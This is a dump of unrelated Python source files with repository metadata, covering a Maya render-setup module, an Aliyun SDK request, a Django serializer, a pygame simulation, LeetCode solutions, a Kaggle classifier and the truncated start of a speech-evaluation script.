return nodeName in self.getSelector().getAbsoluteNames()
def typeId(self):
return AOVChildCollection.kTypeId
def typeName(self):
return AOVChildCollection.kTypeName
def _createSelector(self, parent=None, selArgs=None):
# Selector type name argument is ignored.
self._createAndConnectSelector('', selArgs)
def _createSelectorNode(self, typeName, selectorName, selArgs):
# Ignore the argument selector type name: get the AOV child
# collection selector from the AOV renderer callback.
#
# selArgs is a dictionary for selector argument
# construction. It must contain a value for 'aovName'.
callbacks = rendererCallbacks.getCallbacks(rendererCallbacks.CALLBACKS_TYPE_AOVS)
return callbacks.getChildCollectionSelector(selectorName, selArgs['aovName'])
def setSelectorType(self, typeName):
raise RuntimeError('Illegal call to derived class method.')
def compute(self, plug, dataBlock):
computeEnabled.compute(self, plug, dataBlock)
def isSelfAcceptableChild(self):
"""This code prevents copy/paste of AOV child collections to themselves/other AOV child collections."""
return False
@undo.chunk('Create collection')
@namespace.root
def create(name, nodeType=Collection.kTypeName, parent=None, **selArgs):
""" Create a collection.
Returns the MPxNode object corresponding to the created
collection node. A RuntimeError is raised in case of error.
The selArgs keyword arguments are passed along to the selector creation.
This function is undoable.
"""
# collection names should never contain namespace delimiter or other invalid characters
# collections belong to current namespace (i.e. root)
name = re.sub(r'[^a-zA-Z0-9_]', '_', name)
if isinstance(nodeType, basestring):
typeName = nodeType
else:
typeName = cmds.objectType(typeFromTag=nodeType.id())
# To avoid writing a command to implement collection creation,
# re-use existing name-based commands for undo / redo purposes, since
# collection creation is not performance-critical. If the name
# flag is specified, it cannot be an empty string.
returnCollectionName = cmds.createNode(
typeName, name=name, skipSelect=True) if name else \
cmds.createNode(typeName, skipSelect=True)
collection = utils.nameToUserNode(returnCollectionName)
collection._createSelector(parent=parent, selArgs=selArgs)
return collection
@undo.chunk('Delete collection')
def delete(collection):
"""Remove the argument collection from the scene.
All overrides and sub-collections in the collection are removed."""
# Inform our parent (if any) of upcoming delete.
# This will remove the collection from its parent,
# and will trigger deactivation of the collection
# causing it and the selector to stop listening to scene and attribute changes.
# Need to call _preChildDelete before removing children, otherwise we lose the parenting information
# to the children which may be used by the parent (ex: renderLayers use that information
# to determine if they need to be refreshed).
parent = collection.parent()
if parent:
parent._preChildDelete(collection)
# Delete the children.
for child in collection.getChildren():
if isinstance(child, Collection):
delete(child)
else:
override.delete(child)
# Deleting the selector means unhooking the selector node
# from the collection and removing it from the scene.
collection._deleteSelector()
# Deleting the node will remove it from the scene.
utils.deleteNode(collection)
@undo.chunk('Unapply a collection')
def unapply(collection):
''' Command to unapply a collection '''
if isinstance(collection, Collection):
for c in collection.getChildren():
unapply(c)
else:
# End of recursion so unapply the override
# using a command
override.UnapplyCmd.execute(collection)
def getAllCollectionClasses():
""" Returns the list of Collection subclasses """
return commonUtils.getSubClasses(Collection)
_collectionTypes = { c.kTypeName for c in getAllCollectionClasses() }
_overrideTypes = { o.kTypeName for o in overrideUtils.getAllOverrideClasses() }
# ===========================================================================
# Copyright 2016 Autodesk, Inc. All rights reserved.
#
# Use of this software is subject to the terms of the Autodesk license
# agreement provided at the time of installation or download, or which
# otherwise accompanies this software in either electronic or hard copy form.
# ===========================================================================
| [
"[email protected]"
] | |
4c97d826d472e0652439b84bf0a10fcd553a634a | 3f7fcd4caf0f1caf2b4cdb71f5691ea504358292 | /sampletest3.py | d81d1e4bb717df1f0c61f56b69257a1a18f0657d | [] | no_license | tarak1006/python | 2369d16da5d17c90462068480461f32e3320258a | 1aa1ce6429a3a836073b8a8a359ef8ca91b3bfea | refs/heads/master | 2021-07-10T18:01:30.353637 | 2017-10-14T14:02:34 | 2017-10-14T14:02:34 | 106,932,147 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 315 | py |
a=[2,11,16,12,36,60,71,17,29,144,288,129,432,993]
n =len(a)
def Best(i):
if i==0:
return 1
else:
m=1
for j in range(i):
if a[i]%a[j]==0:
m=max(m,Best(j)+1)
return m
res=[]
for j in range(n):
res.append(Best(j))
print max(res)
| [
"[email protected]"
] | |
95b9fdca571f3e098ef2c1ff21e6bd48597afc65 | f09dc121f213f2881df3572288b7ee5b39246d73 | /aliyun-python-sdk-cms/aliyunsdkcms/request/v20190101/ModifyHostInfoRequest.py | b5160544bcb63311836cf513c07824b15c12694d | [
"Apache-2.0"
] | permissive | hetw/aliyun-openapi-python-sdk | 2f31378ad6be0896fb8090423f607e9c7d3ae774 | 7443eacee9fbbaa93c7975c6dbec92d3c364c577 | refs/heads/master | 2023-01-19T22:42:36.214770 | 2020-12-04T10:55:14 | 2020-12-04T10:55:14 | 318,689,093 | 1 | 0 | NOASSERTION | 2020-12-05T03:03:03 | 2020-12-05T03:03:03 | null | UTF-8 | Python | false | false | 1,332 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
class ModifyHostInfoRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Cms', '2019-01-01', 'ModifyHostInfo','cms')
self.set_method('POST')
def get_HostName(self):
return self.get_query_params().get('HostName')
def set_HostName(self,HostName):
self.add_query_param('HostName',HostName)
def get_InstanceId(self):
return self.get_query_params().get('InstanceId')
def set_InstanceId(self,InstanceId):
self.add_query_param('InstanceId',InstanceId) | [
"[email protected]"
] | |
432aae4837c6d251b61eb69326fd327cebce4c6c | a63d907ad63ba6705420a6fb2788196d1bd3763c | /src/api/resourcecenter/serializers/processing_metrics_serializers.py | bb72d5540d96efd33b60750a04d702611cbf0b03 | [
"MIT"
] | permissive | Tencent/bk-base | a38461072811667dc2880a13a5232004fe771a4b | 6d483b4df67739b26cc8ecaa56c1d76ab46bd7a2 | refs/heads/master | 2022-07-30T04:24:53.370661 | 2022-04-02T10:30:55 | 2022-04-02T10:30:55 | 381,257,882 | 101 | 51 | NOASSERTION | 2022-04-02T10:30:56 | 2021-06-29T06:10:01 | Python | UTF-8 | Python | false | false | 2,364 | py | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-BASE 蓝鲸基础平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-BASE 蓝鲸基础平台 is licensed under the MIT License.
License for BK-BASE 蓝鲸基础平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import datetime
from django.utils.translation import ugettext as _
from rest_framework import serializers
from common.exceptions import ValidationError
class ProcessingMetricSummarySerializer(serializers.Serializer):
start_time = serializers.CharField(label=_("开始日期"))
end_time = serializers.CharField(label=_("结束日期"))
geog_area_code = serializers.CharField(required=False, label=_("地区"))
def validate_start_time(self, start_time):
try:
datetime.datetime.strptime(start_time, "%Y-%m-%d %H:%M:%S")
except ValueError:
raise ValidationError(_("开始日期,格式为YYYY-MM-DD HH:mm:SS"))
return start_time
def validate_end_time(self, end_time):
try:
datetime.datetime.strptime(end_time, "%Y-%m-%d %H:%M:%S")
except ValueError:
raise ValidationError(_("结束日期,格式为YYYY-MM-DD HH:mm:SS"))
return end_time
| [
"[email protected]"
] | |
c281292e06d3742bd682a5d8766d5862720b284c | 6f63ad6f179c4c5bc4e2c82f741067fc030e1351 | /CSE111/esteem.py | dfdfd26f68658ce800c957c9f573228e2ca89a12 | [] | no_license | Kyle5150/CSE111 | 8e152fdbac93854259de8b7328dd183ccbafe35a | 7f4db03eed69232085323fb5dd80e60a0fa5b618 | refs/heads/main | 2023-06-02T20:00:49.043137 | 2021-06-17T07:26:51 | 2021-06-17T07:26:51 | 377,741,877 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,545 | py | NEGATIVE = -1
POSITIVE = 1
def main():
print("This program is an implementaiton of the Rosenberg Self-Esteem Scale.")
print("This program will show you ten statements that you could possibly")
print("apply to yourself. Please rate how much you agree with each of the")
print("statements by responding with one of these four letters:")
print()
print("D means you strongly disagree with the statement.")
print("d means you disagree with the statement.")
print("a means you agree with the statement.")
print("A means you strongly agree with the statement.")
print()
score = 0
score += ask_question("1. I feel that I am a person of worth, at least on an equal plane with others.", POSITIVE)
score += ask_question("2. I feel that I have a number of good qualities.", POSITIVE)
score += ask_question("3. All in all, I am inclined to feel that I am a failure.", NEGATIVE)
score += ask_question("4. I am able to do things as well as most other people.", POSITIVE)
score += ask_question("5. I feel I do not have much to be proud of.", NEGATIVE)
score += ask_question("6. I take a positive attitude toward myself.", POSITIVE)
score += ask_question("7. On the whole, I am satisfied with myself.", POSITIVE)
score += ask_question("8. I wish I could have more respect for myself.", NEGATIVE)
score += ask_question("9. I certainly feel useless at times.", NEGATIVE)
score += ask_question("10. At times I think I am no good at all.", NEGATIVE)
print()
print(f"Your score is {score}.")
print("A score below 15 may indicate problematic low self-esteem.")
def ask_question(statement, pos_or_neg):
"""Display one statement to the user and get the user's response.
Then determine the score for the response and return the score.
Parameters
statement: The statement to show the user.
pos_or_neg: Either the constant POSITIVE or NEGATIVE.
Return: the score from the user's response to the statement.
"""
print(statement)
answer = input("Enter D, d, a, or A: ")
score = 0
if answer == 'D':
score = 0
elif answer == 'd':
score = 1
elif answer == 'a':
score = 2
elif answer == 'A':
score = 3
if pos_or_neg == NEGATIVE:
score = 3 - score
return score
# If this file was executed like this:
# > python esteem.py
# then call the main function. However, if this file
# was simply imported, then skip the call to main.
if __name__ == "__main__":
main() | [
"[email protected]"
] | |
51573e5e37c9a202919b9704bc45f94207c17118 | 925216786fd041fcf5eaffaecb323e3e7d46e6fc | /cosc343worldPythonMacOS/cosc343world.py | ee5440b02da2f5c7feebb94f44fdfeaa8355e4ce | [] | no_license | HarryMead/NeuralNetworkWorld | a0f1fe8a2e76868612297242a8e3f66d7e080f74 | 98a8ad721c2673b7b26f3cbed19097a717f29cf5 | refs/heads/master | 2022-12-05T22:47:35.688295 | 2020-08-23T12:53:50 | 2020-08-23T12:53:50 | 283,945,710 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,296 | py | #!/usr/bin/env python
from cosc343worldcc import _cCreature, _cWorld
import numpy as np
import time
import sys
# This is a creature class that your EvolvingCreature needs to inherit from.
# This class wraps the _cCreature class which was implemented in C.
class Creature(_cCreature):
# Your child class must override this method, where the
# mapping of percepts to actions is implemented
def AgentFunction(self, percepts, nActions):
print("Your EvolvingCreature needs to override the AgentFunction method!")
sys.exit(-1)
# Agent function, which is called from the simulation of the world implemented in C.
# This method translates the percepts to a python list, and translates back
# the list representing the actions into C format.
def internal_AgentFunction(self):
# Get the number of percepts and actions
nPercepts = self.numPercepts()
nActions = self.numActions()
# Create lists of percepts
percepts = np.zeros((nPercepts))
for i in range(nPercepts):
percepts[i] = self.getPercept(i)
# Execute the AgentFunction method that needs to be implemented
# by the EvolvingCreature. Pass in the list of percepts and
# specify the number of actions expected.
actions = self.AgentFunction(percepts, nActions)
if not isinstance(actions, list) or len(actions) != nActions:
print("Error! Expecting the actions returned from the AgentFunction to be a list of %d numbers." % nActions)
# Translate actions and feed it back to the engine
for i in range(nActions):
self.setAction(i, actions[i])
# Wrapper class for _cWorld which implements the engine for the simulation
class World(_cWorld):
# Initialise the wrapper with some defaults for the world type, grid size
# and the repeatability setting.
def __init__(self, worldType=1, gridSize=24, repeatable=False):
self.ph = None
self.worldType = worldType
super().__init__(worldType, gridSize, repeatable)
# Feed the next generation of creatures to the simulation
#
# Input: population - a list of creatures for the simulation
def setNextGeneration(self, population):
self.resetCreatures()
for i in range(len(population)):
self.addCreature(population[i])
# Animation of the simulation
#
# Input: titleStr - title string of the simulation
# speed - of the visualisation: can be 'slow', 'normal' or 'fast'
def show_simulation(self, titleStr = "", speed='normal'):
import pygame
gridSize = self.gridSize()
left_frame = 100
# Initialise pygame
pygame.init()
# Specify the size of the widnow
size = width, height = 720, 480
WHITE = (255, 255, 255)
BLACK = 0, 0, 0
if speed == "normal":
frameTurns = 20
nSteps = 10
elif speed == "fast":
frameTurns = 1
nSteps = 5
elif speed == "slow":
frameTurns = 40
nSteps = 10
# Create pygame screen
screen = pygame.display.set_mode(size)
# Compute the size of the individual square
unit = int(np.min([width-left_frame, height])/gridSize)
# Load images
im_strawbs = [pygame.image.load('images/strawberry-green.png'),
pygame.image.load('images/strawberry-red.png')
]
im_creatures = [pygame.image.load('images/smiley_happy.png'),
pygame.image.load('images/smiley_hungry.png'),
pygame.image.load('images/smiley_sick.png')
]
# Scale the images for the size of the individual square
for i in range(len(im_strawbs)):
im_strawbs[i] = pygame.transform.scale(im_strawbs[i], (unit, unit))
for i in range(len(im_creatures)):
im_creatures[i] = pygame.transform.scale(im_creatures[i], (unit, unit))
im_monster = pygame.transform.scale(pygame.image.load("images/monster.png"), (unit, unit))
# Read the total number of turns from the engine
nTurns = self.vis_numTurns()
# The speed of animation depends on specified speed
stepDiff = 1.0/float(nSteps)
# Read the number food items, creatures and monsters from the engine
nFood = self.vis_num(0)
nCreatures = self.vis_num(1)
nMonsters = self.vis_num(2)
nBodies = [nFood, nCreatures, nMonsters]
halfSteps = int(np.floor(nSteps/2))
# Showing visulisation of the simulation state at each turn
for t in range(1, nTurns + 1):
# Update the window caption to specify the turn number
pygame.display.set_caption("World %d, %s (turn %d)" % (self.worldType, titleStr, t))
# The nSteps is the number of animations between a turn (the slower, the smoother the animation)
for k in range(nSteps):
for event in pygame.event.get():
if event.type == pygame.QUIT: sys.exit()
# Paint the window in white
screen.fill(WHITE)
# Draw the grid lines in black
for i in range(gridSize + 1):
pygame.draw.line(screen, BLACK, [left_frame, i*unit], [left_frame+(gridSize*unit), i*unit])
pygame.draw.line(screen, BLACK, [left_frame+(i*unit), 0], [left_frame+(i*unit), gridSize * unit])
# Iterate over all item types...
for type in range(3):
# For the number of items in each type...
for i in range(nBodies[type]):
# Get the position and state at turn t
x = self.vis(type, 0, i, t)
y = self.vis(type, 1, i, t)
s = self.vis(type, 2, i, t)
# Get the position at turn t-1
xprev = self.vis(type, 0, i, t-1)
yprev = self.vis(type, 1, i, t-1)
# Compute the shift from t-1 to t based on current frame
xshift = xprev-x
if np.abs(xshift)<=1:
xdiff = (x - xprev) * k * stepDiff
elif k <= halfSteps:
xdiff = np.sign(xshift) * k * stepDiff
else:
xdiff = -np.sign(xshift) * k * stepDiff
xprev = x
yshift = yprev - y
if np.abs(yshift) <= 1:
ydiff = (y - yprev) * k * stepDiff
elif k <= halfSteps:
ydiff = np.sign(yshift) * k * stepDiff
else:
ydiff = -np.sign(yshift) * k * stepDiff
yprev = y
# If the item is food...
if type==0:
# ...depending on the state show the green or red strawberry icon
if s >= 0 and s <= 1:
obj_loc = pygame.Rect(left_frame + (x * unit), y * unit, unit, unit)
obj_im = im_strawbs[s]
screen.blit(obj_im, obj_loc)
# If the item is a creature...
elif type==1:
# ...show only if not dead
if s > 0:
# Depending on state show different creature icon
obj_im = im_creatures[s-1]
obj_loc = pygame.Rect(left_frame + (xprev + xdiff) * unit, (yprev + ydiff) * unit, unit,
unit)
screen.blit(obj_im, obj_loc)
# If the item is a monster...
elif type==2:
#...show the monster icon
obj_loc = pygame.Rect(left_frame+(xprev + xdiff) * unit, (yprev + ydiff) * unit, unit, unit)
screen.blit(im_monster, obj_loc)
# Update the dislplay
pygame.display.flip()
pygame.time.delay(frameTurns)
pygame.display.quit()
pygame.quit()
| [
"[email protected]"
] | |
3941489ec2a7e0de2b1adcec8caab3fafca2f3a0 | 4b4df51041551c9a855468ddf1d5004a988f59a2 | /leetcode_python/Array/corporate-flight-bookings.py | d6486593ea2dc4f37b79869a1f72ef71fc6dc067 | [] | no_license | yennanliu/CS_basics | 99b7ad3ef6817f04881d6a1993ec634f81525596 | 035ef08434fa1ca781a6fb2f9eed3538b7d20c02 | refs/heads/master | 2023-09-03T13:42:26.611712 | 2023-09-03T12:46:08 | 2023-09-03T12:46:08 | 66,194,791 | 64 | 40 | null | 2022-08-20T09:44:48 | 2016-08-21T11:11:35 | Python | UTF-8 | Python | false | false | 5,073 | py | """
1109. Corporate Flight Bookings
Medium
There are n flights that are labeled from 1 to n.
You are given an array of flight bookings bookings, where bookings[i] = [firsti, lasti, seatsi] represents a booking for flights firsti through lasti (inclusive) with seatsi seats reserved for each flight in the range.
Return an array answer of length n, where answer[i] is the total number of seats reserved for flight i.
Example 1:
Input: bookings = [[1,2,10],[2,3,20],[2,5,25]], n = 5
Output: [10,55,45,25,25]
Explanation:
Flight labels: 1 2 3 4 5
Booking 1 reserved: 10 10
Booking 2 reserved: 20 20
Booking 3 reserved: 25 25 25 25
Total seats: 10 55 45 25 25
Hence, answer = [10,55,45,25,25]
Example 2:
Input: bookings = [[1,2,10],[2,2,15]], n = 2
Output: [10,25]
Explanation:
Flight labels: 1 2
Booking 1 reserved: 10 10
Booking 2 reserved: 15
Total seats: 10 25
Hence, answer = [10,25]
Constraints:
1 <= n <= 2 * 104
1 <= bookings.length <= 2 * 104
bookings[i].length == 3
1 <= firsti <= lasti <= n
1 <= seatsi <= 104
"""
# V0
# V1
# IDEA : ARRAY + prefix sum
# https://leetcode.com/problems/corporate-flight-bookings/discuss/328856/JavaC%2B%2BPython-Sweep-Line
# IDEA :
# Set the change of seats for each day.
# If booking = [i, j, k],
# it needs k more seat on ith day,
# and we don't need these seats on j+1th day.
# We accumulate these changes then we have the result that we want.
# Complexity
# Time O(booking + N) for one pass on bookings
# Space O(N) for the result
class Solution:
def corpFlightBookings(self, bookings, n):
res = [0] * (n + 1)
for i, j, k in bookings:
res[i - 1] += k
res[j] -= k
for i in range(1, n):
res[i] += res[i - 1]
return res[:-1]
# V1'
# IDEA : ARRAY + prefix sum
# https://leetcode.com/problems/corporate-flight-bookings/discuss/328949/Simple-Python-solution
class Solution:
def corpFlightBookings(self, bookings: List[List[int]], n: int) -> List[int]:
answer = n * [0]
lst = []
for i, j, num in bookings:
lst.append((i - 1, num))
lst.append((j, -num))
lst.sort()
curr_num = 0
prev_i = 0
for i, num in lst:
for j in range(prev_i, i):
answer[j] += curr_num
prev_i = i
curr_num += num
return answer
# V1''
# IDEA : ARRAY
# https://leetcode.com/problems/corporate-flight-bookings/discuss/328893/Short-python-solution
# IDEA : Simply use two arrays to keep track of how many bookings are added for every flight.
class Solution:
def corpFlightBookings(self, bookings: List[List[int]], n: int) -> List[int]:
opens = [0]*n
closes = [0]*n
for e in bookings:
opens[e[0]-1] += e[2]
closes[e[1]-1] += e[2]
ret, tmp = [0]*n, 0
for i in range(n):
tmp += opens[i]
ret[i] = tmp
tmp -= closes[i]
return ret
# V1'''
# https://leetcode.com/problems/corporate-flight-bookings/discuss/328986/Python-linear-solution
class Solution:
def corpFlightBookings(self, bookings: List[List[int]], n: int) -> List[int]:
res = [0] * (n + 2)
for booking in bookings:
start, end, seats = booking
res[start] += seats
res[end + 1] -= seats
for i in range(1, len(res)):
res[i] += res[i - 1]
# don't keep first because bookings are 1-based
# don't keep last because it's out of range
return res[1:-1]
# V1''''
# https://leetcode.com/problems/corporate-flight-bookings/discuss/328863/Python-concise-sum
class Solution:
def corpFlightBookings(self, bookings: List[List[int]], n: int) -> List[int]:
res = [0] * n
i = cur = 0
for j, val in sorted([[i - 1, k] for i, j, k in bookings] + [[j, -k] for i, j, k in bookings]):
while i < j:
res[i] = cur
i += 1
cur += val
return res
# V1''''''
# https://zxi.mytechroad.com/blog/math/leetcode-1109-corporate-flight-bookings/
# C++
# class Solution {
# public:
# vector<int> corpFlightBookings(vector<vector<int>>& bookings, int n) {
# vector<int> ans(n + 1);
# for (const auto& b : bookings) {
# ans[b[0] - 1] += b[2];
# ans[b[1]] -= b[2];
# }
# for (int i = 1; i < n; ++i)
# ans[i] += ans[i - 1];
# ans.pop_back();
# return ans;
# }
# };
# V1''''''''
# https://blog.51cto.com/u_15344287/3646723
class Solution:
def corpFlightBookings(self, bookings: List[List[int]], n: int) -> List[int]:
lst = [0] * (n + 1)
for j, k, l in bookings:
lst[j - 1] += l
lst[k] -= l
lst.pop()
ans = []
now = 0
for i in range(len(lst)):
now += lst[i]
ans.append(now)
return ans
# V2 | [
"[email protected]"
] | |
6fa980d4dd5a9231591dcd0dfff776d63cf6e4d2 | 64530babd4336421ef28feea8e0c69fddf6ca394 | /tuple.py | 5bc07629159ff6e5ae7bbd6e389cd31caa5246fe | [] | no_license | judy1116/pythonDemo | 0e35e51da7bc82354b11e67219bfe1ba742048d7 | 1e8f3e2a48b1804a12f7d93a7477a8d3e5bdf450 | refs/heads/master | 2021-08-31T10:49:22.219034 | 2017-12-21T03:20:23 | 2017-12-21T03:20:23 | 114,954,420 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,432 | py | #不可变的tuple有什么意义?因为tuple不可变,所以代码更安全。如果可能,能用tuple代替list就尽量用tuple。
#另一种有序列表叫元组:tuple。tuple和list非常类似,但是tuple一旦初始化就不能修改,比如同样是列出同学的名字:
classmates = ('Michael', 'Bob', 'Tracy')
#现在,classmates这个tuple不能变了,它也没有append(),insert()这样的方法。其他获取元素的方法和list是一样的,你可以正常地使用classmates[0],classmates[-1],但不能赋值成另外的元素。
print(classmates[0])
t = (1, 2)
f = ()
#定义的不是tuple,是1这个数!这是因为括号()既可以表示tuple,又可以表示数学公式中的小括号,这就产生了歧义,因此,Python规定,这种情况下,按小括号进行计算,计算结果自然是1。
#所以,只有1个元素的tuple定义时必须加一个逗号,,来消除歧义:
e=(1,)
#"可变的"tuple
#表面上看,tuple的元素确实变了,但其实变的不是tuple的元素,而是list的元素。tuple一开始指向的list并没有改成别的list,所以,tuple所谓的“不变”是说,tuple的每个元素,指向永远不变。即指向'a',就不能改成指向'b',指向一个list,就不能改成指向其他对象,但指向的这个list本身是可变的!
g=('a','b',['A','B'])
g[2][0]='X'
g[2][1]='Y'
print(g) | [
"[email protected]"
] | |
8da121d649ea828a915d2f8fee0f8d2f41569f13 | bfc25f1ad7bfe061b57cfab82aba9d0af1453491 | /data/external/repositories_2to3/120243/tradeshift-text-classification-master/src/online-model/tk7_solution.py | ffa812f783556c5f81ae943cd1fa4a0497105321 | [
"MIT"
] | permissive | Keesiu/meta-kaggle | 77d134620ebce530d183467202cf45639d9c6ff2 | 87de739aba2399fd31072ee81b391f9b7a63f540 | refs/heads/master | 2020-03-28T00:23:10.584151 | 2018-12-20T19:09:50 | 2018-12-20T19:09:50 | 147,406,338 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,176 | py | '''
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
Version 2, December 2004
Copyright (C) 2004 Sam Hocevar <[email protected]>
Everyone is permitted to copy and distribute verbatim or modified
copies of this license document, and changing it is allowed as long
as the name is changed.
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
0. You just DO WHAT THE FUCK YOU WANT TO.
'''
from datetime import datetime
from math import log, exp, sqrt
# TL; DR
# the main learning process start at line 122
# parameters #################################################################
import sys
data_dir=sys.argv[1]
sub_dir=sys.argv[2]
train = data_dir+'train.csv' # path to training file
label = data_dir+'trainLabels.csv' # path to label file of training data
test = data_dir+'test.csv' # path to testing file
D = 2 ** 23 # number of weights use for each model, we have 32 of them
alpha = .1 # learning rate for sgd optimization
# function, generator definitions ############################################
# A. x, y generator
# INPUT:
# path: path to train.csv or test.csv
# label_path: (optional) path to trainLabels.csv
# YIELDS:
# ID: id of the instance (can also acts as instance count)
# x: a list of indices that its value is 1
# y: (if label_path is present) label value of y1 to y33
def data(path, label_path=None):
for t, line in enumerate(open(path)):
# initialize our generator
if t == 0:
# create a static x,
# so we don't have to construct a new x for every instance
x = [0] * (146+13*14/2+1)
if label_path:
label = open(label_path)
label.readline() # we don't need the headers
continue
# parse x
for m, feat in enumerate(line.rstrip().split(',')):
if m == 0:
ID = int(feat)
else:
# one-hot encode everything with hash trick
# categorical: one-hotted
# boolean: ONE-HOTTED
# numerical: ONE-HOTTED!
# note, the build in hash(), although fast is not stable,
# i.e., same value won't always have the same hash
# on different machines
x[m] = abs(hash(str(m) + '_' + feat)) % D
row=line.rstrip().split(',')
hash_cols = [64,65,61,62,91,92,142,3,4,61,34,91,94,95]
t = 146
for i in range(14):
for j in range(i+1,14):
t += 1
x[t] = abs(hash(str(i)+'_'+str(j)+'_'+row[hash_cols[i]]+"_x_"+row[hash_cols[j]])) % D
# parse y, if provided
if label_path:
# use float() to prevent future type casting, [1:] to ignore id
y = [float(y) for y in label.readline().split(',')[1:]]
yield (ID, x, y) if label_path else (ID, x)
# B. Bounded logloss
# INPUT:
# p: our prediction
# y: real answer
# OUTPUT
# bounded logarithmic loss of p given y
def logloss(p, y):
p = max(min(p, 1. - 10e-15), 10e-15)
return -log(p) if y == 1. else -log(1. - p)
# C. Get probability estimation on x
# INPUT:
# x: features
# w: weights
# OUTPUT:
# probability of p(y = 1 | x; w)
def predict(x, w):
wTx = 0.
for i in x: # do wTx
wTx += w[i] * 1. # w[i] * x[i], but if i in x we got x[i] = 1.
return 1. / (1. + exp(-max(min(wTx, 20.), -20.))) # bounded sigmoid
# D. Update given model
# INPUT:
# alpha: learning rate
# w: weights
# n: sum of previous absolute gradients for a given feature
# this is used for adaptive learning rate
# x: feature, a list of indices
# p: prediction of our model
# y: answer
# MODIFIES:
# w: weights
# n: sum of past absolute gradients
def update(alpha, w, n, x, p, y):
for i in x:
# alpha / sqrt(n) is the adaptive learning rate
# (p - y) * x[i] is the current gradient
# note that in our case, if i in x then x[i] = 1.
n[i] += abs(p - y)
w[i] -= (p - y) * 1. * alpha / sqrt(n[i])
# training and testing #######################################################
start = datetime.now()
# a list for range(0, 33) - 13, no need to learn y14 since it is always 0
K = [k for k in range(33) if k != 13]
# initialize our model, all 32 of them, again ignoring y14
w = [[0.] * D if k != 13 else None for k in range(33)]
n = [[0.] * D if k != 13 else None for k in range(33)]
loss = 0.
loss_y14 = log(1. - 10**-15)
for ID, x, y in data(train, label):
# get predictions and train on all labels
for k in K:
p = predict(x, w[k])
update(alpha, w[k], n[k], x, p, y[k])
loss += logloss(p, y[k]) # for progressive validation
loss += loss_y14 # the loss of y14, logloss is never zero
# print out progress, so that we know everything is working
if ID % 100000 == 0:
print(('%s\tencountered: %d\tcurrent logloss: %f' % (
datetime.now(), ID, (loss/33.)/ID)))
for ID, x, y in data(train, label):
# get predictions and train on all labels
for k in K:
p = predict(x, w[k])
update(alpha, w[k], n[k], x, p, y[k])
loss += logloss(p, y[k]) # for progressive validation
loss += loss_y14 # the loss of y14, logloss is never zero
# print out progress, so that we know everything is working
if ID % 100000 == 0:
print(('%s\tencountered: %d\tcurrent logloss: %f' % (
datetime.now(), ID, (loss/33.)/ID)))
with open(sub_dir+'./submissiontk7.csv', 'w') as outfile:
outfile.write('id_label,pred\n')
for ID, x in data(test):
for k in K:
p = predict(x, w[k])
outfile.write('%s_y%d,%s\n' % (ID, k+1, str(p)))
if k == 12:
outfile.write('%s_y14,0.0\n' % ID)
print(('Done, elapsed time: %s' % str(datetime.now() - start)))
| [
"[email protected]"
] | |
f6d7ae62aec0c8ee20db1465a48e9ad487cd7662 | 6430f1d91ca5b7a5d4c19dac26f148e746166f65 | /evaluate.py | eb8fe7db2ce94130d64f14c25b53b9538424d8fd | [] | no_license | cp917/speech_enhancement | e855a3ba82d48f4579367e792b93d81d0faf3f40 | 815c7f3a8f78344d206a58d48ce49d7e4ba657d9 | refs/heads/master | 2020-12-09T10:37:40.157443 | 2019-09-17T03:27:34 | 2019-09-17T03:27:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,931 | py | """
Summary: Calculate PESQ and overal stats of enhanced speech.
Author: Qiuqiang Kong
Created: 2017.12.22
Modified: -
"""
import argparse
import os
import csv
import numpy as np
import cPickle
import soundfile
from pypesq import pypesq
from pystoi.stoi import stoi
from prepare_data import create_folder
#import matplotlib.pyplot as plt
def plot_training_stat(args):
"""Plot training and testing loss.
Args:
workspace: str, path of workspace.
tr_snr: float, training SNR.
bgn_iter: int, plot from bgn_iter
fin_iter: int, plot finish at fin_iter
interval_iter: int, interval of files.
"""
workspace = args.workspace
tr_snr = args.tr_snr
bgn_iter = args.bgn_iter
fin_iter = args.fin_iter
interval_iter = args.interval_iter
tr_losses, te_losses, iters = [], [], []
# Load stats.
stats_dir = os.path.join(workspace, "training_stats", "%ddb" % int(tr_snr))
for iter in xrange(bgn_iter, fin_iter, interval_iter):
stats_path = os.path.join(stats_dir, "%diters.p" % iter)
dict = cPickle.load(open(stats_path, 'rb'))
tr_losses.append(dict['tr_loss'])
